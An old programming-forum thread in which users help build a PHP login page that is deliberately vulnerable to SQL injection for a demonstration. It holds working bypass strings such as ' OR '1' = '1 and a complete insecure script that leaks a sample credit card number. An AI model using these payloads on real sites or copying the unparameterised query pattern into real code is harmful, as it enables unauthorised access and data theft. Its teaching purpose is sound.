Jump to content




Recent Topics

Recent Status Updates

  • Photo
      18 Aug
    KodeKool

    When faced with a wall of errors and no hope to fix them, remember the following "Programs always do what you tell them to, and seldom what you want them to, but eventually you'll run out of things that can go wrong and it'll just work. and that's the secret to good programming."

    Show comments (2)
View All Updates

Developed by Kemal Taskin
Photo
- - - - -

Make a script vulnerable to SQL injection?


  • Please log in to reply
8 replies to this topic

#1 shibbythestoner

shibbythestoner

    CC Addict

  • Just Joined
  • PipPipPipPipPip
  • 109 posts

Posted 15 December 2007 - 12:50 PM

Hello.

I find myself in need of a way to show how some things can go wrong with php, databases, and the web. I decided there are few better ways than to demonstrate an SQL injection.
My problem is, however, that the injections don't appear to be working.
I've made sure that the variables passed through are pure input (employed stripslashes(), didn't use mysql_real_escape_string(), and so on). I've made various different attempts at injection, but so far the best result I get is an error about the following line:
if (mysql_num_rows($execute) == NULL){
mysql_num_rows(): supplied argument is not a valid MySQL result resource
Which is the error appearing on attempted injections.
Here is some of the code I have been using:
                                if (!$db){
                                    
                                    die("<font color='#F62817'><b>Error: Could not connect to database - ".mysql_error()."</b></font><p>\n");
                                    include("admin_loginform.php");
                                    mysql_close($db);
                                    
                                } //end of if
                                else {
                                    
                                    //Leaving $admin and $password open to SQL injection for demonstration purposes
                                    
                                    $query="SELECT *
                                        FROM admins
                                        WHERE username='$admin' AND password='$password'";
                                    $execute=mysql_query($query,$db);
                                    if (mysql_num_rows($execute) == NULL){
                                        
                                        echo "<font color='#F62817'><b>Error: Invalid username or password.</b></font><p>\n";
                                        include("admin_loginform.php");
                                        mysql_close($db);
                                        
                                    } //end of if
                                    else {
                                        
                                        echo "<font color='#5EFB6E'><b>Welcome to administration, $admin.</font></b><br>\n";
                                        echo "What do you want to do?<br>\n";
Can anyone tell me what I could do to make my script vulnerable? For once I want my script to be exploited and I find it doesn't work anyway! I've Googled a bit but I've either not looked in the right places or (oddly enough) there's not much material on how to MAKE a website more vulnerable.

Summary: I need my script to be exploitable via SQL injection. Any ideas please?
  • 0
Posted Image

#2 Guest_Jordan_*

Guest_Jordan_*
  • Guest

Posted 15 December 2007 - 01:45 PM

Everything looks good and vulnerable here. How are you calling your script? You should call it as:

http://domain/script.php?admin=OR 1&password=anything

The OR 1 will cause a clause in the execution of your SQL Query that always equals true.

Also, I'm not entirely sure that the above statement will actually return any rows. This would cause the mysql_num_rows not to return anything.

You could try doing:


http://domain/script...min&password=OR 1

Which would cause the SQL to return the row with the username of admin.

Sidewinder should be able to help more once he sees this. He is fairly good with security and PHP.
  • 0

#3 shibbythestoner

shibbythestoner

    CC Addict

  • Just Joined
  • PipPipPipPipPip
  • 109 posts

Posted 15 December 2007 - 04:21 PM

So you suggest the use of the GET method, as opposed to POST? I'll try that out...perhaps that's what I've been doing wrong all along. You may well be correct about mysql_num_rows() returning nothing; since that's where some problems appear to originate from.
Well thanks very much, I'll try that out.

Edit: I'm afraid those suggestions didn't work, the input seems to go through fine but I still get the invalid username/password error. Anything else I could try?
  • 0
Posted Image

#4 shibbythestoner

shibbythestoner

    CC Addict

  • Just Joined
  • PipPipPipPipPip
  • 109 posts

Posted 15 December 2007 - 04:44 PM

Thanks to the "Similar Threads" feature I happened upon, I found the answer in v0id's post on Sidewinder's thread,
http://forum.codecal...injections.html
Trying this:
' OR '1' = '1
works fine on my script. Thanks, guys!
  • 0
Posted Image

#5 John

John

    CC Mentor

  • Moderator
  • 4,450 posts
  • Location:New York, NY

Posted 15 December 2007 - 04:53 PM

It's really all about how crappy you write your code, when I wrote a my tutorial on SQL injections [http://forum.codecal...injections.html], I couldn't for the life of me get a functional demo to work. However, you inspired me to give it another shot, and I managed to get it to work. I'm not really in the mood for explaining [tutorial does most of it] it so I'll just post my code and you can figure it out yourself.

Database: injectiontest
CREATE TABLE `users` (
`id` int(11) NOT NULL auto_increment,
`username` varchar(200) NOT NULL,
`password` varchar(200) NOT NULL,
`creditcard` varchar(200) NOT NULL,
PRIMARY KEY (`id`)
);

INSERT INTO `users` (`id`, `username`, `password`, `creditcard`) VALUES
(1, 'Sidewinder', 'monkey', '0123456789987654');


File: login.php
<?php

if(get_magic_quotes_gpc()) {
$username = stripslashes($_GET['username']);
$password = stripslashes($_GET['password']);
}

$link = @mysql_connect('localhost', '', '')
or die('Could not connect: ' . mysql_error());

mysql_select_db('injectiontest', $link)
or die('Could not select database.');


$query = mysql_query("SELECT * FROM `users` "
. "WHERE `username` = '$username' "
. "AND `password` = '$password'");
$row = mysql_fetch_assoc($query);

if(mysql_num_rows($query) == 1) {
echo "Hello {$row['username']}!<br />";
echo "Your creditcard number is: {$row['creditcard']}";
}

?>


Then if you point your browser to:

login.php?username=anything&password=anything'%20OR%201='1


You will see:

Hello Sidewinder!
Your creditcard number is: 0123456789987654


  • 0

#6 shibbythestoner

shibbythestoner

    CC Addict

  • Just Joined
  • PipPipPipPipPip
  • 109 posts

Posted 15 December 2007 - 05:36 PM

Cool script Sidewinder!
Also, thanks for your credit card number.
  • 0
Posted Image

#7 Guest_Jordan_*

Guest_Jordan_*
  • Guest

Posted 15 December 2007 - 06:17 PM

Nice work Sidewinder!
  • 0

#8 John

John

    CC Mentor

  • Moderator
  • 4,450 posts
  • Location:New York, NY

Posted 15 December 2007 - 06:56 PM

It feels weird being complemented for providing a script with poor standards, horrible security measures, and completely senseless code - but thanks :)
  • 0

#9 SumeetSharma

SumeetSharma

    CC Lurker

  • Just Joined
  • Pip
  • 1 posts

Posted 11 October 2013 - 10:27 PM

I am totally new to Php and Sql,but i managed to run php file using xampp

When i click login.php in web browser,it says "Could not select database"

I have pasted injectiontest.sql and login.php in htdocs folder and activated Apache & Mysql

Can you please reply asap with the exact Sql code and Php Code that i can use?

Because i will be using this script in my project "to detect and prevent sqlia"


  • 0